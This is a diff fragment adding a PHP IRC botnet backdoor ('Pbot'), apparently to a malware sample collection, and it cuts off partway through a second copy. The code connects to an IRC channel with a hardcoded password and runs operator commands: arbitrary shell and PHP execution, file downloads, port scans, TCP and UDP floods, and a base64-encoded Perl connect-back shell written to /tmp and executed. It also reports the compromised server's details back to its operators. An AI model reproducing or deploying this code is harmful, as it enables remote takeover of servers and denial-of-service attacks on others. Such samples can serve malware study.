$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = exec($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "passthru":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = passthru($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "popen":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
|
||||||
|
$pipe = popen($command,"r");
|
||||||
|
while(!feof($pipe))
|
||||||
|
{
|
||||||
|
$pbuf = trim(fgets($pipe,512));
|
||||||
|
if($pbuf != NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : $pbuf");
|
||||||
|
}
|
||||||
|
pclose($pipe);
|
||||||
|
}
|
||||||
|
|
||||||
|
case "system":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = system($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case "pscan": // .pscan 127.0.0.1 6667
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
|
||||||
|
else
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "ud.server": // .ud.server <server> <port> [password]
|
||||||
|
if(count($mcmd)>2)
|
||||||
|
{
|
||||||
|
$this->config['server'] = $mcmd[1];
|
||||||
|
$this->config['port'] = $mcmd[2];
|
||||||
|
if(isset($mcmcd[3]))
|
||||||
|
{
|
||||||
|
$this->config['pass'] = $mcmd[3];
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "download":
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(!$fp = fopen($mcmd[2],"w"))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(!$get = file($mcmd[1]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<=count($get);$i++)
|
||||||
|
{
|
||||||
|
fwrite($fp,$get[$i]);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
|
||||||
|
}
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
|
||||||
|
break;
|
||||||
|
case "die":
|
||||||
|
$this->send("QUIT :die command from $nick");
|
||||||
|
fclose($this->conn);
|
||||||
|
exit;
|
||||||
|
case "logout":
|
||||||
|
$this->log_out($host);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
|
||||||
|
break;
|
||||||
|
case "udpflood":
|
||||||
|
if(count($mcmd)>3)
|
||||||
|
{
|
||||||
|
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "tcpflood":
|
||||||
|
if(count($mcmd)>5)
|
||||||
|
{
|
||||||
|
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$old_buf = $this->buf;
|
||||||
|
}
|
||||||
|
$this->start();
|
||||||
|
}
|
||||||
|
function send($msg)
|
||||||
|
{
|
||||||
|
fwrite($this->conn,"$msg\r\n");
|
||||||
|
|
||||||
|
}
|
||||||
|
function join($chan,$key=NULL)
|
||||||
|
{
|
||||||
|
$this->send("JOIN $chan $key");
|
||||||
|
}
|
||||||
|
function privmsg($to,$msg)
|
||||||
|
{
|
||||||
|
$this->send("PRIVMSG $to :$msg");
|
||||||
|
}
|
||||||
|
function notice($to,$msg)
|
||||||
|
{
|
||||||
|
$this->send("NOTICE $to :$msg");
|
||||||
|
}
|
||||||
|
function is_logged_in($host)
|
||||||
|
{
|
||||||
|
if(isset($this->users[$host]))
|
||||||
|
return 1;
|
||||||
|
else
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
function log_in($host)
|
||||||
|
{
|
||||||
|
$this->users[$host] = true;
|
||||||
|
}
|
||||||
|
function log_out($host)
|
||||||
|
{
|
||||||
|
unset($this->users[$host]);
|
||||||
|
}
|
||||||
|
function set_nick()
|
||||||
|
{
|
||||||
|
if(isset($_SERVER['SERVER_SOFTWARE']))
|
||||||
|
{
|
||||||
|
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
|
||||||
|
$this->nick = "[A]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
|
||||||
|
$this->nick = "[I]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
|
||||||
|
$this->nick = "[X]";
|
||||||
|
else
|
||||||
|
$this->nick = "[U]";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->nick = "[C]";
|
||||||
|
}
|
||||||
|
$this->nick .= $this->config['prefix'];
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$this->nick .= mt_rand(0,9);
|
||||||
|
$this->send("NICK ".$this->nick);
|
||||||
|
}
|
||||||
|
function udpflood($host,$packetsize,$time) {
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
|
||||||
|
$timei = time();
|
||||||
|
$i = 0;
|
||||||
|
while(time()-$timei < $time) {
|
||||||
|
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
$env = $i * $packetsize;
|
||||||
|
$env = $env / 1048576;
|
||||||
|
$vel = $env / $time;
|
||||||
|
$vel = round($vel);
|
||||||
|
$env = round($env);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
|
||||||
|
}
|
||||||
|
function tcpflood($host,$packets,$packetsize,$port,$delay)
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++)
|
||||||
|
$packet .= chr(mt_rand(1,256));
|
||||||
|
for($i=0;$i<$packets;$i++)
|
||||||
|
{
|
||||||
|
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
sleep($delay);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
|
||||||
|
}
|
||||||
|
function conback($ip,$port)
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
|
||||||
|
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
|
||||||
|
if (is_writable("/tmp"))
|
||||||
|
{
|
||||||
|
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
|
||||||
|
$fp=fopen("/tmp/dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl /tmp/dc.pl $ip $port &");
|
||||||
|
unlink("/tmp/dc.pl");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if (is_writable("/var/tmp"))
|
||||||
|
{
|
||||||
|
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
|
||||||
|
$fp=fopen("/var/tmp/dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl /var/tmp/dc.pl $ip $port &");
|
||||||
|
unlink("/var/tmp/dc.pl");
|
||||||
|
}
|
||||||
|
if (is_writable("."))
|
||||||
|
{
|
||||||
|
if (file_exists("dc.pl")) { unlink("dc.pl"); }
|
||||||
|
$fp=fopen("dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl dc.pl $ip $port &");
|
||||||
|
unlink("dc.pl");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$bot = new pBot;
|
||||||
|
$bot->start();
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
516
PHP/Backdoor.PHP.Pbot.b
Normal file
516
PHP/Backdoor.PHP.Pbot.b
Normal file
@ -0,0 +1,516 @@
|
|||||||
|
<?
|
||||||
|
|
||||||
|
/*
|
||||||
|
*
|
||||||
|
* #korban. since 2003
|
||||||
|
* edited by: devil__ <admin@xdevil.org>
|
||||||
|
*
|
||||||
|
* COMMANDS:
|
||||||
|
*
|
||||||
|
* .user <password> //login to the bot
|
||||||
|
* .logout //logout of the bot
|
||||||
|
* .die //kill the bot
|
||||||
|
* .restart //restart the bot
|
||||||
|
* .mail <to> <from> <subject> <msg> //send an email
|
||||||
|
* .dns <IP|HOST> //dns lookup
|
||||||
|
* .download <URL> <filename> //download a file
|
||||||
|
* .exec <cmd> // uses exec() //execute a command
|
||||||
|
* .sexec <cmd> // uses shell_exec() //execute a command
|
||||||
|
* .cmd <cmd> // uses popen() //execute a command
|
||||||
|
* .info //get system information
|
||||||
|
* .php <php code> // uses eval() //execute php code
|
||||||
|
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
|
||||||
|
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
|
||||||
|
* .raw <cmd> //raw IRC command
|
||||||
|
* .rndnick //change nickname
|
||||||
|
* .pscan <host> <port> //port scan
|
||||||
|
* .safe // test safe_mode (dvl)
|
||||||
|
* .inbox <to> // test inbox (dvl)
|
||||||
|
* .conback <ip> <port> // conect back (dvl)
|
||||||
|
* .uname // return shell's uname using a php function (dvl)
|
||||||
|
*
|
||||||
|
*/
|
||||||
|
|
||||||
|
set_time_limit(0);
|
||||||
|
error_reporting(0);
|
||||||
|
echo "ok!";
|
||||||
|
|
||||||
|
class pBot
|
||||||
|
{
|
||||||
|
var $config = array("server"=>"irc.dal.net",
|
||||||
|
"port"=>"7000",
|
||||||
|
"pass"=>"",
|
||||||
|
"prefix"=>"aisen",
|
||||||
|
"maxrand"=>"2",
|
||||||
|
"chan"=>"#waktu",
|
||||||
|
"chan2"=>"#majene",
|
||||||
|
"key"=>"1988",
|
||||||
|
"modes"=>"+ps",
|
||||||
|
"password"=>"1988",
|
||||||
|
"trigger"=>".",
|
||||||
|
"hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org)
|
||||||
|
);
|
||||||
|
var $users = array();
|
||||||
|
function start()
|
||||||
|
{
|
||||||
|
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
|
||||||
|
$this->start();
|
||||||
|
$ident = $this->config['prefix'];
|
||||||
|
$alph = range("0","9");
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$ident .= $alph[rand(0,9)];
|
||||||
|
if(strlen($this->config['pass'])>0)
|
||||||
|
$this->send("PASS ".$this->config['pass']);
|
||||||
|
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
|
||||||
|
$this->set_nick();
|
||||||
|
$this->main();
|
||||||
|
}
|
||||||
|
function main()
|
||||||
|
{
|
||||||
|
while(!feof($this->conn))
|
||||||
|
{
|
||||||
|
$this->buf = trim(fgets($this->conn,512));
|
||||||
|
$cmd = explode(" ",$this->buf);
|
||||||
|
if(substr($this->buf,0,6)=="PING :")
|
||||||
|
{
|
||||||
|
$this->send("PONG :".substr($this->buf,6));
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1] =="001")
|
||||||
|
{
|
||||||
|
$this->send("MODE ".$this->nick." ".$this->config['modes']);
|
||||||
|
$this->join($this->config['chan'],$this->config['key']);
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
|
||||||
|
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1]=="433")
|
||||||
|
{
|
||||||
|
$this->set_nick();
|
||||||
|
}
|
||||||
|
if($this->buf != $old_buf)
|
||||||
|
{
|
||||||
|
$mcmd = array();
|
||||||
|
$msg = substr(strstr($this->buf," :"),2);
|
||||||
|
$msgcmd = explode(" ",$msg);
|
||||||
|
$nick = explode("!",$cmd[0]);
|
||||||
|
$vhost = explode("@",$nick[1]);
|
||||||
|
$vhost = $vhost[1];
|
||||||
|
$nick = substr($nick[0],1);
|
||||||
|
$host = $cmd[0];
|
||||||
|
if($msgcmd[0]==$this->nick)
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i+1];
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i];
|
||||||
|
}
|
||||||
|
if(count($cmd)>2)
|
||||||
|
{
|
||||||
|
switch($cmd[1])
|
||||||
|
{
|
||||||
|
case "QUIT":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PART":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PRIVMSG":
|
||||||
|
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "user":
|
||||||
|
if($mcmd[1]==$this->config['password'])
|
||||||
|
{
|
||||||
|
$this->log_in($host);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "restart":
|
||||||
|
$this->send("QUIT :restart commando from $nick");
|
||||||
|
fclose($this->conn);
|
||||||
|
$this->start();
|
||||||
|
break;
|
||||||
|
case "mail": //mail to from subject message
|
||||||
|
if(count($mcmd)>4)
|
||||||
|
{
|
||||||
|
$header = "From: <".$mcmd[2].">";
|
||||||
|
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "safe":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
|
||||||
|
{
|
||||||
|
$safemode = "on";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$safemode = "off";
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
|
||||||
|
break;
|
||||||
|
case "inbox": //teste inbox
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$token = md5(uniqid(rand(), true));
|
||||||
|
$header = "From: <inbox".$token."@xdevil.org>";
|
||||||
|
$a = php_uname();
|
||||||
|
$b = getenv("SERVER_SOFTWARE");
|
||||||
|
$c = gethostbyname($_SERVER["HTTP_HOST"]);
|
||||||
|
if(!mail($mcmd[1],"InBox Test","#korban. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "conback":
|
||||||
|
if(count($mcmd)>2)
|
||||||
|
{
|
||||||
|
$this->conback($mcmd[1],$mcmd[2]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "dns":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$ip = explode(".",$mcmd[1]);
|
||||||
|
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "info":
|
||||||
|
case "vunl":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
|
||||||
|
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
|
||||||
|
break;
|
||||||
|
case "bot":
|
||||||
|
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #korban.");
|
||||||
|
break;
|
||||||
|
case "uname":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
|
||||||
|
break;
|
||||||
|
case "rndnick":
|
||||||
|
$this->set_nick();
|
||||||
|
break;
|
||||||
|
case "raw":
|
||||||
|
$this->send(strstr($msg,$mcmd[1]));
|
||||||
|
break;
|
||||||
|
case "eval":
|
||||||
|
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
|
||||||
|
break;
|
||||||
|
case "sexec":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = shell_exec($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "exec":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = exec($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "passthru":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = passthru($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "popen":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
|
||||||
|
$pipe = popen($command,"r");
|
||||||
|
while(!feof($pipe))
|
||||||
|
{
|
||||||
|
$pbuf = trim(fgets($pipe,512));
|
||||||
|
if($pbuf != NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : $pbuf");
|
||||||
|
}
|
||||||
|
pclose($pipe);
|
||||||
|
}
|
||||||
|
|
||||||
|
case "system":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = system($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case "pscan": // .pscan 127.0.0.1 6667
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
|
||||||
|
else
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "ud.server": // .ud.server <server> <port> [password]
|
||||||
|
if(count($mcmd)>2)
|
||||||
|
{
|
||||||
|
$this->config['server'] = $mcmd[1];
|
||||||
|
$this->config['port'] = $mcmd[2];
|
||||||
|
if(isset($mcmcd[3]))
|
||||||
|
{
|
||||||
|
$this->config['pass'] = $mcmd[3];
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "download":
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(!$fp = fopen($mcmd[2],"w"))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(!$get = file($mcmd[1]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<=count($get);$i++)
|
||||||
|
{
|
||||||
|
fwrite($fp,$get[$i]);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
|
||||||
|
}
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
|
||||||
|
break;
|
||||||
|
case "die":
|
||||||
|
$this->send("QUIT :die command from $nick");
|
||||||
|
fclose($this->conn);
|
||||||
|
exit;
|
||||||
|
case "logout":
|
||||||
|
$this->log_out($host);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
|
||||||
|
break;
|
||||||
|
case "udpflood":
|
||||||
|
if(count($mcmd)>3)
|
||||||
|
{
|
||||||
|
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "tcpflood":
|
||||||
|
if(count($mcmd)>5)
|
||||||
|
{
|
||||||
|
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$old_buf = $this->buf;
|
||||||
|
}
|
||||||
|
$this->start();
|
||||||
|
}
|
||||||
|
function send($msg)
|
||||||
|
{
|
||||||
|
fwrite($this->conn,"$msg\r\n");
|
||||||
|
|
||||||
|
}
|
||||||
|
function join($chan,$key=NULL)
|
||||||
|
{
|
||||||
|
$this->send("JOIN $chan $key");
|
||||||
|
}
|
||||||
|
function privmsg($to,$msg)
|
||||||
|
{
|
||||||
|
$this->send("PRIVMSG $to :$msg");
|
||||||
|
}
|
||||||
|
function notice($to,$msg)
|
||||||
|
{
|
||||||
|
$this->send("NOTICE $to :$msg");
|
||||||
|
}
|
||||||
|
function is_logged_in($host)
|
||||||
|
{
|
||||||
|
if(isset($this->users[$host]))
|
||||||
|
return 1;
|
||||||
|
else
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
function log_in($host)
|
||||||
|
{
|
||||||
|
$this->users[$host] = true;
|
||||||
|
}
|
||||||
|
function log_out($host)
|
||||||
|
{
|
||||||
|
unset($this->users[$host]);
|
||||||
|
}
|
||||||
|
